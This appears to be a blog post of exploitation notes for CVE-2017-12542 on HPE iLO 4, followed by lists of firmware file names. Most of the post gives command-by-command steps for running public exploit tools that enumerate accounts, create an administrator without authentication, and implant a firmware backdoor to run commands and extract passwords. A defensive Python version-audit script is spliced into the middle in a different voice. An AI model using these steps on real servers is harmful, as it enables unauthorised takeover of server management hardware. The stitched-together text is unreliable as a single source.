HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

These are just a few notes on exploiting CVE-2017-12542. I am currently looking at various RCEs and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the Python script at https://github.com/skelsec/CVE-2017-12542 or the Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account).

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above from https://github.com/skelsec/CVE-2017-12542 or the Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account).

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The backdoor can be found at https://github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4. Following HPE’s advisory, it looks like all iLO4 versions prior to version 2.53 are affected, so if you are using an old version in a corporate environment, please consider upgrading the firmware, which can be obtained directly from HPE (ver 2.60, 30 May 2018).
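A firmware audit for the upgrade advice above, as an added example (not part of the original post or of either toolkit): it classifies saved `/xmldata?item=all` responses, the same request used in the steps below, against the 2.53 threshold stated here. The sample responses are constructed, and the `<PN>` element and the `RIMP`/`MP` wrapper are assumptions about the response layout; only `<FWRI>` appears on this page.

```python
import re
import sys
from pathlib import Path

FIXED_IN = (2, 53)  # per the page: iLO 4 versions prior to 2.53 are affected

# Constructed sample responses (not captured from real devices). Only <FWRI>
# appears on the page; <PN> and the RIMP/MP wrapper are assumed layout.
SAMPLES = {
    "old": "<RIMP><MP><PN>Integrated Lights-Out 4 (iLO 4)</PN><FWRI>2.50</FWRI></MP></RIMP>",
    "page-style": "<RIMP><MP><PN>Integrated Lights-Out 4 (iLO 4)</PN><FWRI>2.5.3</FWRI></MP></RIMP>",
    "ilo5": "<RIMP><MP><PN>Integrated Lights-Out 5 (iLO 5)</PN><FWRI>1.30</FWRI></MP></RIMP>",
    "garbage": "<html>login</html>",
}


def parse_fwri(xml_text):
    """Return (major, minor) from the <FWRI> element, or None if absent."""
    m = re.search(r"<FWRI>\s*(\d+)\.(\d+(?:\.\d+)*)\s*</FWRI>", xml_text, re.I)
    if not m:
        return None
    # Assumption: iLO versions are major.minor with a two-digit minor, so
    # "2.5.3" (as printed on the page) and "2.53" both mean (2, 53).
    return int(m.group(1)), int(m.group(2).replace(".", ""))


def classify(xml_text):
    """Return 'affected', 'ok', 'not-ilo4' or 'unknown' for one response."""
    version = parse_fwri(xml_text)
    if version is None:
        return "unknown"
    pn = re.search(r"<PN>(.*?)</PN>", xml_text, re.I | re.S)
    if pn and "iLO 4" not in pn.group(1):
        return "not-ilo4"  # the 2.53 threshold only applies to iLO 4
    return "affected" if version < FIXED_IN else "ok"


def audit(responses):
    """Map each name (host or file name) to its classification."""
    return {name: classify(text) for name, text in responses.items()}


if __name__ == "__main__":
    # With arguments: files holding saved xmldata output; without: the samples.
    inputs = {p: Path(p).read_text(errors="replace") for p in sys.argv[1:]}
    for name, status in sorted(audit(inputs or SAMPLES).items()):
        print(f"{status:9} {name}")
```

Responses without a `<PN>` element are treated as iLO 4, so only feed it output from hosts you know to be iLO 4 or that include the product name.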

Steps on how to get command execution on HP iLO and extract passwords

$ git clone https://github.com/airbus-seclab/ilo4_toolbox
$ curl -s -k https://x.x.x.x/xmldata?item=all | grep -i "<FWRI>"
<FWRI>2.5.3</FWRI>

$ wget https://downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe --unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd("/usr/bin/id")
ib.remove_linux_backdoor()

HPE iLO Firmware Download Links

**Updated 23/07/2018**

Using the links below you can download recent HPE iLO (Integrated Lights-Out) firmware files. To get to the .bin file you will need to extract the .exe with 7zip and then install it via the iLO webpage, or run the .exe on the server itself. These are all I could find on HPE’s website:

  1. iLO1 Latest: ilo196.bin (30-Apr-2014)
  2. iLO2 Latest: ilo2_232.bin (18-Feb-2018)
  3. iLO3 Latest: ilo3_189.bin (07-Jul-2017)
  4. iLO4 Latest: ilo4_260.bin (23-May-2018)
  5. iLO5 Latest: ilo5_130.bin (4-Jun-2018)

ILO1:
ilo187.bin
ilo188.bin
ilo189.bin
ilo191.bin
ilo192.bin
ilo193.bin
ilo194.bin
ilo195.bin

ILO2:
ilo2_120.bin
ilo2_122.bin
ilo2_124.bin
ilo2_126.bin
ilo2_129.bin
ilo2_130.bin
ilo2_135.bin
ilo2_140.bin
ilo2_142.bin
ilo2_143.bin
ilo2_150.bin
ilo2_160.bin
ilo2_161.bin
ilo2_170.bin
ilo2_175.bin
ilo2_177.bin
ilo2_178.bin
ilo2_179.bin
ilo2_180.bin
ilo2_181.bin
ilo2_182.bin
ilo2_183.bin
ilo2_201.bin
ilo2_205.bin
ilo2_206.bin
ilo2_207.bin
ilo2_208.bin
ilo2_209.bin
ilo2_212.bin
ilo2_213.bin
ilo2_215.bin
ilo2_220.bin
ilo2_222.bin
ilo2_223.bin
ilo2_225.bin
ilo2_227.bin
ilo2_228.bin
ilo2_229.bin
ilo2_230.bin
ilo2_231.bin

ILO3:
ilo3_187.bin
ilo3_100.bin
ilo3_105.bin
ilo3_110.bin
ilo3_115.bin
ilo3_116.bin
ilo3_120.bin
ilo3_126.bin
ilo3_128.bin
ilo3_150.bin
ilo3_155.bin
ilo3_157.bin
ilo3_161.bin
ilo3_165.bin
ilo3_170.bin
ilo3_180.bin
ilo3_182.bin
ilo3_185.bin
ilo3_187.bin
ilo3_188.bin

ILO4:
ilo4_101.bin
ilo4_105.bin
ilo4_110.bin
ilo4_113.bin
ilo4_120.bin
ilo4_122.bin
ilo4_130.bin
ilo4_132.bin
ilo4_140.bin
ilo4_150.bin
ilo4_151.bin
ilo4_153.bin
ilo4_200.bin
ilo4_202.bin
ilo4_203.bin
ilo4_210.bin
ilo4_211.bin
ilo4_220.bin
ilo4_222.bin
ilo4_230.bin
ilo4_231.bin
ilo4_240.bin
ilo4_242.bin
ilo4_244.bin
ilo4_250.bin
ilo4_253.bin
ilo4_254.bin
ilo4_255.bin

ILO5:
ilo5_117.bin
ilo5_120.bin